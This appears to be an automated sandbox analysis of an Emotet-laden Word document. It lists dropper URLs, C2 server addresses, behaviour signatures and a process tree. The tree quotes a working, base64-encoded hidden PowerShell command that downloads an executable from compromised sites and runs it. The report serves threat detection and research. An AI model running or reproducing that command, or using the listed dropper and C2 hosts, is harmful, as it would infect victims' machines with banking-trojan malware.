Analysis

  • max time kernel
    144s
  • resource
    win7v191014
  • submitted
    17-12-2019 13:56

General

  • Target

    Docs_fbff465d66a0eb834b052719a27f5ab1.30

  • Sample

    191217-nms2qfss6n

  • SHA256

    6568a3a8206a6474f34f2f1d7a2951653070f60517ef2fb92c47d005bc4f7fbe

Score
10/10

Malware Config

Extracted

Language
ps1
Source
URLs
exe.dropper

http://nangngucsiam.com/wp-content/plugins/wp-ffpc/4ij33/

exe.dropper

http://jsd-id.com/wp-content/uploads/4ae3ep99933/

exe.dropper

http://18teens.xyz/wp-content/epewe862/

exe.dropper

http://www.fundzit.com/wp-admin/g05/

exe.dropper

http://wp.banyannaples.com/cgi-bin/97sq9667/

Extracted

Family

emotet

C2

152.170.108.99:443

99.252.27.6:80

93.148.252.90:80

96.126.121.64:443

104.236.137.72:8080

85.234.143.94:8080

80.85.87.122:8080

2.139.158.136:443

80.11.158.65:8080

79.31.85.103:80

77.55.211.77:8080

96.61.113.203:80

181.198.203.45:443

142.93.114.137:8080

186.15.83.52:8080

181.36.42.205:443

68.183.190.199:8080

159.203.204.126:8080

50.28.51.143:8080

46.101.212.195:8080

rsa_pubkey.plain

Signatures

  • Suspicious use of AdjustPrivilegeToken 1 IoCs
  • Suspicious use of WriteProcessMemory 3 IoCs
  • Suspicious behavior: EmotetMutantsSpam 2 IoCs
  • Modifies registry class 144 IoCs
  • Emotet

    Emotet is a trojan that is primarily spread through spam emails

  • Suspicious behavior: AddClipboardFormatListener 1 IoCs
  • Suspicious use of SetWindowsHookEx 7 IoCs
  • Suspicious use of FindShellTrayWindow 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 2 IoCs
  • Executes dropped EXE 4 IoCs
  • Drops file in System32 directory 6 IoCs

Processes

  • C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
    "C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\Admin\AppData\Local\Temp\Docs_fbff465d66a0eb834b052719a27f5ab1.30.doc"
    1⤵
    • Suspicious behavior: AddClipboardFormatListener
    • Suspicious use of SetWindowsHookEx
    • Suspicious use of FindShellTrayWindow
    • Drops file in System32 directory
    PID:1268
  • C:\Windows\SYSTEM32\WISPTIS.EXE
    /QuitInfo:000000000000060C;0000000000000658;
    1⤵
    • Suspicious use of SetWindowsHookEx
    PID:1108
  • C:\Windows\SYSTEM32\WISPTIS.EXE
    /QuitInfo:000000000000060C;0000000000000658;
    1⤵
    • Suspicious use of SetWindowsHookEx
    PID:1936
  • C:\Windows\System32\WindowsPowerShell\v1.0\Powershell.exe
    Powershell -w hidden -en JABSAHoAeQBuAGgAcQBnAHcAdAB5AD0AJwBVAHcAZABkAGEAbgBxAG4AaQByAGgAdQAnADsAJABJAHoAdwBzAHIAawBzAGcAdgBkAGMAZwAgAD0AIAAnADYANwAnADsAJABPAGkAZwBiAGcAegB1AGwAPQAnAEQAdwBtAG0AbQBmAHkAegB6AHEAdgBkAHMAJwA7ACQAVQBlAGsAZABuAG4AZABjAGgAdwByAGUAPQAkAGUAbgB2ADoAdQBzAGUAcgBwAHIAbwBmAGkAbABlACsAJwBcACcAKwAkAEkAegB3AHMAcgBrAHMAZwB2AGQAYwBnACsAJwAuAGUAeABlACcAOwAkAFAAYQBhAHoAcgBlAGwAcwBwAHMAbgA9ACcATQB0AHoAbAB2AGYAdwByAGQAYgB2AGwAagAnADsAJABaAHkAagBzAHEAdgB2AHUAYQB2AHoAaQBlAD0ALgAoACcAbgBlAHcALQBvACcAKwAnAGIAagAnACsAJwBlAGMAdAAnACkAIABOAEUAVAAuAHcARQBCAEMATABJAEUAbgBUADsAJABJAGsAYgBhAGUAYwBnAGcAeQA9ACcAaAB0AHQAcAA6AC8ALwBuAGEAbgBnAG4AZwB1AGMAcwBpAGEAbQAuAGMAbwBtAC8AdwBwAC0AYwBvAG4AdABlAG4AdAAvAHAAbAB1AGcAaQBuAHMALwB3AHAALQBmAGYAcABjAC8ANABpAGoAMwAzAC8AKgBoAHQAdABwADoALwAvAGoAcwBkAC0AaQBkAC4AYwBvAG0ALwB3AHAALQBjAG8AbgB0AGUAbgB0AC8AdQBwAGwAbwBhAGQAcwAvADQAYQBlADMAZQBwADkAOQA5ADMAMwAvACoAaAB0AHQAcAA6AC8ALwAxADgAdABlAGUAbgBzAC4AeAB5AHoALwB3AHAALQBjAG8AbgB0AGUAbgB0AC8AZQBwAGUAdwBlADgANgAyAC8AKgBoAHQAdABwADoALwAvAHcAdwB3AC4AZgB1AG4AZAB6AGkAdAAuAGMAbwBtAC8AdwBwAC0AYQBkAG0AaQBuAC8AZwAwADUALwAqAGgAdAB0AHAAOgAvAC8AdwBwAC4AYgBhAG4AeQBhAG4AbgBhAHAAbABlAHMALgBjAG8AbQAvAGMAZwBpAC0AYgBpAG4ALwA5ADcAcwBxADkANgA2ADcALwAnAC4AIgBTAFAAYABsAGkAVAAiACgAJwAqACcAKQA7ACQAWgBmAGsAcQBkAG4AcgB5AD0AJwBRAHUAcwBlAHgAdQB5AHMAYQBtACcAOwBmAG8AcgBlAGEAYwBoACgAJABaAHIAcwB0AGcAcQByAGUAbQB0ACAAaQBuACAAJABJAGsAYgBhAGUAYwBnAGcAeQApAHsAdAByAHkAewAkAFoAeQBqAHMAcQB2AHYAdQBhAHYAegBpAGUALgAiAEQATwB3AG4AbABgAE8AYABBAEQARgBpAEwAZQAiACgAJABaAHIAcwB0AGcAcQByAGUAbQB0ACwAIAAkAFUAZQBrAGQAbgBuAGQAYwBoAHcAcgBlACkAOwAkAEsAaABtAGcAdwBsAHoAZQBuAGkAagA9ACcASgBoAHgAagBrAHYAdgBmAHoAZgBsAGUAJwA7AEkAZgAgACgAKAAuACgAJwBHAGUAdAAtAEkAdABlACcAKwAnAG0AJwApACAAJABVAGUAawBkAG4AbgBkAGMAaAB3AHIAZQApAC4AIgBsAGUAYABOAEcAVABIACIAIAAtAGcAZQAgADMAMAAwADAAMgApACAAewBbAEQAaQBhAGcAbgBvAHMAdABpAGMAcwAuAFAAcgBvAGMAZQBzAHMAXQA6ADoAIgBTAHQAYQBgAFIAVAAiACgAJABVAGUAawBkAG4AbgBkAGMAaAB3AHIAZQApADsAJABYAHQAaQBpAHcAagB2AGQAZQA9ACcARgB5AHAAeQBoAGwAagBtAG4AbQBiACcAOwBiAHIAZQBhAGsAOwAkAFEAawBrAGwAYwBhAGIAagBmAHMAaAA9ACcAQQBtAGkAbwBlAHQAbAB1AHEAdwBxAGIAeAAnAH0AfQBjAGEAdABjAGgAewB9AH0AJABBAHMAdQB2AGoAcwByAGwAeQBqAGEAZAA9ACcAQQBnAGgAZABpAGsAdwBkAHoAJwA=
    1⤵
    • Suspicious use of AdjustPrivilegeToken
    • Suspicious use of WriteProcessMemory
    • Suspicious behavior: EnumeratesProcesses
    • Drops file in System32 directory
    PID:1404
    • C:\Users\Admin\67.exe
      "C:\Users\Admin\67.exe"
      2⤵
      • Suspicious use of WriteProcessMemory
      • Suspicious use of SetWindowsHookEx
      • Executes dropped EXE
      PID:2228
      • C:\Users\Admin\67.exe
        --4e61eeeb
        3⤵
        • Suspicious behavior: EmotetMutantsSpam
        • Suspicious use of SetWindowsHookEx
        • Executes dropped EXE
        • Drops file in System32 directory
        PID:2252
  • C:\Windows\SysWOW64\dispidprints.exe
    "C:\Windows\SysWOW64\dispidprints.exe"
    1⤵
    • Suspicious use of WriteProcessMemory
    • Suspicious use of SetWindowsHookEx
    • Executes dropped EXE
    PID:2296
    • C:\Windows\SysWOW64\dispidprints.exe
      --5669d0d5
      2⤵
      • Suspicious behavior: EmotetMutantsSpam
      • Suspicious use of SetWindowsHookEx
      • Suspicious behavior: EnumeratesProcesses
      • Executes dropped EXE
      • Drops file in System32 directory
      PID:2320

Network

MITRE ATT&CK Matrix

Replay Monitor

Loading Replay Monitor...

Downloads

  • memory/1268-4-0x0000000007169000-0x000000000716C000-memory.dmp

    Filesize

    12KB

  • memory/1268-0-0x0000000006FA0000-0x0000000006FA4000-memory.dmp

    Filesize

    16KB

  • memory/1268-3-0x000000000A2B0000-0x000000000A2B4000-memory.dmp

    Filesize

    16KB

  • memory/1268-2-0x0000000007169000-0x000000000716C000-memory.dmp

    Filesize

    12KB

  • memory/1268-1-0x0000000006FB5000-0x0000000007049000-memory.dmp

    Filesize

    592KB

  • memory/2228-30-0x0000000000350000-0x0000000000367000-memory.dmp

    Filesize

    92KB

  • memory/2252-33-0x00000000003E0000-0x00000000003F7000-memory.dmp

    Filesize

    92KB

  • memory/2252-34-0x0000000000400000-0x0000000000457000-memory.dmp

    Filesize

    348KB

  • memory/2296-36-0x0000000000320000-0x0000000000337000-memory.dmp

    Filesize

    92KB

  • memory/2320-38-0x00000000003C0000-0x00000000003D7000-memory.dmp

    Filesize

    92KB

  • memory/2320-39-0x0000000000400000-0x0000000000457000-memory.dmp

    Filesize

    348KB